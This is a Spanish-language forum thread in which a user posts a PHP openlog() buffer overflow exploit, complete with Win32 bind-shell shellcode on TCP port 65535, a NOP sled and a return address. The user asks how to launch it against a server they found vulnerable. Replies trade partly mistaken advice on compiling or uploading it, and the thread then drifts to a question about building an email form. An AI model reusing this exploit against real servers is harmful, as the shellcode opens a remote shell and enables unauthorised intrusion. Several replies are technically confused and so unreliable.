PHP openlog() Buffer Overflow Vulnerability

[holograma]

Wenas,
Tengo una duda, encuentro una vulneravilidad en un servidor con PHP
PHP openlog() Buffer Overflow Vulnerability (remota)


y como exploit me da el siguiente:

Código:

<?php
// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].
$gift =  "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x02\x03";
$gift = $gift .
"\x02\x02\x83\xeb\xfc\xe2\xf4\xea\x55\x02\x02\x02\x50\x57\x54\x55";
$gift = $gift .
"\x88\x6e\x26\x1a\x88\x47\x3e\x89\x57\x07\x7a\x03\xe9\x89\x48\x1a";
$gift = $gift .
"\x88\x58\x22\x03\xe8\xe1\x30\x4b\x88\x36\x89\x03\xed\x33\xfd\xfe";
$gift = $gift .
"\x32\xc2\xae\x3a\xe3\x76\x05\xc3\xcc\x0f\x03\xc5\xe8\xf0\x39\x7e";
$gift = $gift .
"\x27\x16\x77\xe3\x88\x58\x26\x03\xe8\x64\x89\x0e\x48\x89\x58\x1e";
$gift = $gift .
"\x02\xe9\x89\x06\x88\x03\xea\xe9\x01\x33\xc2\x5d\x5d\x5f\x59\xc0";
$gift = $gift .
"\x0b\x02\x5c\x68\x33\x5b\x66\x89\x1a\x89\x59\x0e\x88\x59\x1e\x89";
$gift = $gift .
"\x18\x89\x59\x0a\x50\x6a\x8c\x4c\x0d\xee\xfd\xd4\x8a\xc5\x83\xee";
$gift = $gift .
"\x03\x03\x02\x02\x54\x54\x51\x8b\xe6\xea\x25\x02\x03\x02\x92\x03";
$gift = $gift .
"\x03\x02\xb4\x1b\x1b\xe5\xa6\x1b\x73\xeb\xe7\x4b\x85\x4b\xa6\x18";
$gift = $gift .
"\x73\xc5\xa6\xaf\x2d\xeb\xdb\x0b\xf6\xaf\xc9\xef\xff\x39\x55\x51";
$gift = $gift .
"\x31\x5d\x31\x30\x03\x59\x8f\x49\x23\x53\xfd\xd5\x8a\xdd\x8b\xc1";
$gift = $gift .
"\x8e\x77\x16\x68\x04\x5b\x53\x51\xfc\x36\x8d\xfd\x56\x06\x5b\x8b";
$gift = $gift .
"\x07\x8c\xe0\xf0\x28\x25\x56\xfd\x34\xfd\x57\x32\x32\xc2\x52\x52";
$gift = $gift .
"\x53\x52\x42\x52\x43\x52\xfd\x57\x2f\x8b\xc5\x33\xd8\x51\x51\x6a";
$gift = $gift .
"\x01\x02\xfd\xfd\x8a\xe2\x68\x12\x53\x55\xfd\x57\x27\x51\x55\xfd";
$gift = $gift .
"\x56\x2a\x51\x56\x54\xfd\x57\x22\x8a\xc5\x6a\x41\x4e\x46\x02\x8b";
$gift = $gift .
"\xe0\x85\xf8\x33\xc3\x8f\x7e\x26\xaf\x68\x17\x5b\xf0\xa9\x85\xf8";
$gift = $gift .
"\x80\xee\x56\xc4\x47\x26\x12\x46\x65\xc5\x46\x26\x3f\x03\x03\x8b";
$gift = $gift .
"\x7f\x26\x4a\x8b\x7f\x26\x4e\x8b\x7f\x26\x52\x8f\x47\x26\x12\x56";
$gift = $gift .
"\x53\x53\x53\x53\x42\x53\x4b\x53\x52\x51\x53\xfd\x76\x02\x6a\x70";
$gift = $gift .
"\xfd\xb1\x14\xfd\x56\x06\xfd\xd2\x8a\xe4\xfd\x77\x03\x6a\xaf\xdb";
$gift = $gift .
"\x06\xcc\xfd\x57\x07\x8b\xc1\x68\xfc\xfd\x34\xfd\xd0\xfd\x77\x02";
$gift = $gift .
"\x6b\x7c\xda\xe0\x70\xfd\x57\x06\x32\xd9\x51\xfd\xd3\x02\x02";


$ret = "\xb8\x9e\xe3\x77";
$nop =str_repeat("\x90", 1024);
$boomstring = $nop . $ret . $nop . $gift;
openlog($boomstring, LOG_PID, LOG_DAEMON);
// uncomment openlog(); to enable exploit...
?>

Mi pregunta es: como lo envio o conecto...

php exploit.php

no entiendo como enviarlo.

desde ya, muchas gracias...

[askatasun]

primero tienes que compilarlo...

[||Ray||]

Los Exploits de PHP no se compilan lo tienes que subir a un servidor web aunque desconozco el modo de hacerlo funcionar.

Saludos

[askatasun]

Los Exploits de PHP no se compilan lo tienes que subir a un servidor web aunque desconozco el modo de hacerlo funcionar.

Saludos

esto no lo sabia, estaria bien que alguien explicase como se ejecutan

[||Ray||]

PHP nunca se compila, sino que son traducidos a código máquina sobre la marcha a través de un interprete, son lenguajes de script.

Bueno lo que hay que hacer es subirlos a un servidor web luego depende del exploit tienes que hacer una cosa u otra. Este en concreto no lo sé, seguro que donde lo bajaste o en securityfocus te o mismamente google te dice como utilizarlo.

Saludos

[OzX]

se interpretan... como script, perl java, etc. pero tambien se compilan.
php2exe es un programa que pasa el archivo .php a un exe .,

pd: el exploit es un shellcode , es parte de un exploit, pero no el exploit entero .

[crash override]

oie necesito ayuda para crear un formulario y qe los

wns cuando escriban su mensaje al apretar aceptar me llegue lo qe escribieron a mi correo........ ...

(obiamente qe es para mi web)

 

[DarkAngel]

un formulario? lo puedes hacer el formulario en .htm con todos los campos que quieras obtener (la info) y le pones algo asi
<form method="post" action="enviar.php">
para que los datos se envien al .php que se llama "enviar" , y en el enviar.php tienes q capturar los datos en variavles y usar la funcion mail() para mandarlo a tu correo o donde quieras

salu2

[crash override]

como hago para que el php me capture lo enviado??

 

[Kaos007]

Esa misma pregunta haria xD >.<